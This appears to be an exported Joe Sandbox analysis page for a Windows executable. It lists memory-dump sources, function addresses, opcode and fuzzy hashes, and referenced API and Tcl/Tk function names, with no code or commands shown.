Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction ID: 324f0c4e3116d5739d7c89b58c5a24db218ed0c2a8bb8dce483798d4df8b739c
Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
Instruction Fuzzy Hash: 9C51C211F08F1756FA64AB2F591117A6292AF88BD4F8846B5DF0EC77D6EE3CE4429300

Function 00007FF6BA3C3480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6BA3C3484

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction ID: 14844cf53d36101433e2034a08475114874d5a04f480cd3d34cd338d15b69478
Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
Instruction Fuzzy Hash: D1B09220E17B02C2EA082B29BC8222822A4BF48701F9801B8CA5CC0330EE2C24E55710

Function 00007FF6BA3B35A0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction ID: b4a8e2297288016c4b4f8631d64e51ebfd9d3001a75c96bac2809adb8bf30fcb
Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
Instruction Fuzzy Hash: 23D1DE66A08E6686EBA88E2D809037D37A2EF45B48F944375CF0DC7B95DF39E845C740

Function 00007FF6BA3A9800 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction ID: 4f5bcaecd83eacc5b7641f8d958f36c4d3a2889af0b6b908958aa64b5fc5261d
Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
Instruction Fuzzy Hash: 96C19E762181E08BD68AEB29E47947A73E1F78930DB95406BEF87877C5CB3CA414DB10

Function 00007FF6BA3B2C10 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction ID: 616b9e384718e3bac83132c3acf9490e7e3e037eaef6b4c67f9d1a8bf2ffd832
Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
Instruction Fuzzy Hash: DFB15A72A08B8585E7658F6DC09023C3BA6EB49B48FA443BACF4EC7395CF29D442C745

Function 00007FF6BA3BE570 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction ID: 35b95c8e1e60802b0913aa5e425425e6551c1bd3787030755f2764416c6af905
Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
Instruction Fuzzy Hash: 8E81C272A08B8146E7B4CB2D949536A7A92FB45794FA44375DF9DC3B99DF3CE4008B00

Function 00007FF6BA3C6418 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
Instruction ID: 899b194a2ddcc5b3b21920fae936877668724305ba1c0ffd3d93963660d10bc4
Opcode Fuzzy Hash: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
Instruction Fuzzy Hash: B161C332E187A246FBA48A6C985067D6A91AF40760F6452B9DF1DC7BC5FF7DE8808700

Function 00007FF6BA3B1944 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 5d4411b6678a8e61d7807e73298694d041b8bb8038bab55770c7dba86060ca67
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: DE516076A18E5186E7248B2DD04433837A2EB45B68F645272CF8DD77A4DF3AE853C780

Function 00007FF6BA3B2164 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 57a3928ff34bc83a69ea96a146c08b8d06b4d1c4fcbe81b54362b590c0d89fba
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 41517036A18A5586E7648B6DD48422837A2EB58B58F644371DF4DCB7A4CF3AE843C740

Function 00007FF6BA3B1D54 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 9e7adead780bb3059d4d643bde2b3c8c8892e16515e89cf1e60d331aca6122c0
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 00516E36A18A5182E7648B2DC04037937A2EB45B68F644376CF4DD7794CF3AE853C740

Function 00007FF6BA3B1B50 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 91db0d3546a9e6734d809bb70b443ed27fd26c70907ce2f74b21cfa8f0419f54
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: C8517D36A18A51C6E7248B2DC04033927A2EB45B58FA452B2CF4DD7798DF3AE893C740

Function 00007FF6BA3B1740 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: e8b48919a35d4a9b2df72110e9a0b629d03770d509b1a43fb36fe1d626073f5b
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 4D518F36A18E5186E7648B2DC04033977A2EB49B58FA44272CF4DD7798CF3AE843C780

Function 00007FF6BA3B1F60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 4689605720a2d86daaf48e6f8c2e22e0b6c491f9f468f5b12107ba7166bcce3a
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 96517236A18E5586E7248B2DC08433867A2EB49B58F644372DF4DD77A5DF3AE843C740

Function 00007FF6BA3B5D30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 6ecee38f05c1b909041dd6eae2facd6e54647a74e649516f97b539aea721b4f7
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: BD418262C0EF8A05E9A9891C05186B82A829F62BA1DD853F8DF9FD73D7CD1D6587C300

Function 00007FF6BA3B9EA0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction ID: 962f6c69d486470c60afb243670b36fa074c080c2d0471f4c161844b2be1e0b0
Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
Instruction Fuzzy Hash: 0D41D022B14E5586EF04CF2AD924169B3A2BB48FD0B59A136EF4DD7B58DE3DD0428300

Function 00007FF6BA3B80E4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: 088c38d7657c52ba90a82f308338cc67b2675aef059fc49f93e8bc461cbe8871
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: D031A232B19F4282E7649F29A84012E6AD6AB89BD0F544279EF5DD3BE5DF3CD0028704

Function 00007FF6BA3C9570 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction ID: efdd7941a4e1f5c4882e4e9abb1c6c2c9e7e72d90c9ce44a159e8a744c847c8f
Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
Instruction Fuzzy Hash: D0F068717282958BDB988F6DA802A2977D0F7083C0F849079EA8DC3B04DE3CD4518F14

Function 00007FF6BA3AD30C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction ID: bbae68961dd79a87e50d03c26a66adf198bf0add6415017c77f09ba1c8dc1894
Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
Instruction Fuzzy Hash: A7A00261D0CD2AD0EA488F08FC901396335FB64340B8000B1FA0DD10F0BF3CA444D300

Function 00007FF6BA3A76C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6BA3A76D7
GetLastError.KERNEL32 ref: 00007FF6BA3A76E9
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7725
GetLastError.KERNEL32 ref: 00007FF6BA3A7737
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7750
GetLastError.KERNEL32 ref: 00007FF6BA3A7762
GetProcAddress.KERNEL32 ref: 00007FF6BA3A777B
GetLastError.KERNEL32 ref: 00007FF6BA3A778D
GetProcAddress.KERNEL32 ref: 00007FF6BA3A77A9
GetLastError.KERNEL32 ref: 00007FF6BA3A77BB
GetProcAddress.KERNEL32 ref: 00007FF6BA3A77D7
GetLastError.KERNEL32 ref: 00007FF6BA3A77E9
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7805
GetLastError.KERNEL32 ref: 00007FF6BA3A7817
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7833
GetLastError.KERNEL32 ref: 00007FF6BA3A7845
GetProcAddress.KERNEL32 ref: 00007FF6BA3A7861
GetLastError.KERNEL32 ref: 00007FF6BA3A7873

Strings

Tcl_ConditionWait, xrefs: 00007FF6BA3A7999, 00007FF6BA3A79BB
Tcl_Finalize, xrefs: 00007FF6BA3A779F, 00007FF6BA3A77C1
Tcl_CreateThread, xrefs: 00007FF6BA3A7829, 00007FF6BA3A784B
Tcl_MutexLock, xrefs: 00007FF6BA3A78B3, 00007FF6BA3A78D5
Tcl_CreateObjCommand, xrefs: 00007FF6BA3A7A7F, 00007FF6BA3A7AA1
Tcl_MutexUnlock, xrefs: 00007FF6BA3A78E1, 00007FF6BA3A7903
Tcl_GetCurrentThread, xrefs: 00007FF6BA3A7857, 00007FF6BA3A7879
Tcl_ThreadAlert, xrefs: 00007FF6BA3A79F5, 00007FF6BA3A7A17
GetProcAddress, xrefs: 00007FF6BA3A76FF
Tcl_ConditionFinalize, xrefs: 00007FF6BA3A793D, 00007FF6BA3A795F
Tcl_GetObjResult, xrefs: 00007FF6BA3A7B65, 00007FF6BA3A7B87
Tcl_DoOneEvent, xrefs: 00007FF6BA3A7771, 00007FF6BA3A7793
Tcl_NewByteArrayObj, xrefs: 00007FF6BA3A7B09, 00007FF6BA3A7B2B
Tcl_SetVar2Ex, xrefs: 00007FF6BA3A7B37, 00007FF6BA3A7B59
Tcl_EvalEx, xrefs: 00007FF6BA3A7BC1, 00007FF6BA3A7BE3
Tcl_EvalFile, xrefs: 00007FF6BA3A7B93, 00007FF6BA3A7BB5
Tcl_DeleteInterp, xrefs: 00007FF6BA3A77FB, 00007FF6BA3A781D
Tcl_ConditionNotify, xrefs: 00007FF6BA3A796B, 00007FF6BA3A798D
Tcl_GetString, xrefs: 00007FF6BA3A7AAD, 00007FF6BA3A7ACF
Failed to get address for %hs, xrefs: 00007FF6BA3A76F8
Tcl_FindExecutable, xrefs: 00007FF6BA3A7746, 00007FF6BA3A7768
Tcl_NewStringObj, xrefs: 00007FF6BA3A7ADB, 00007FF6BA3A7AFD
Tk_Init, xrefs: 00007FF6BA3A7C79, 00007FF6BA3A7C9B
Tcl_Alloc, xrefs: 00007FF6BA3A7C1D, 00007FF6BA3A7C3F
Tcl_JoinThread, xrefs: 00007FF6BA3A7885, 00007FF6BA3A78A7
Tcl_MutexFinalize, xrefs: 00007FF6BA3A790F, 00007FF6BA3A7931
Tcl_SetVar2, xrefs: 00007FF6BA3A7A51, 00007FF6BA3A7A73
Tcl_Free, xrefs: 00007FF6BA3A7C4B, 00007FF6BA3A7C6D
Tcl_EvalObjv, xrefs: 00007FF6BA3A7BEF, 00007FF6BA3A7C11
Tcl_ThreadQueueEvent, xrefs: 00007FF6BA3A79C7, 00007FF6BA3A79E9
Tk_GetNumMainWindows, xrefs: 00007FF6BA3A7CA7, 00007FF6BA3A7CC9
Tcl_Init, xrefs: 00007FF6BA3A76D0, 00007FF6BA3A76EF
Tcl_FinalizeThread, xrefs: 00007FF6BA3A77CD, 00007FF6BA3A77EF
Tcl_GetVar2, xrefs: 00007FF6BA3A7A23, 00007FF6BA3A7A45
Tcl_CreateInterp, xrefs: 00007FF6BA3A771B, 00007FF6BA3A773D

Memory Dump Source

Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

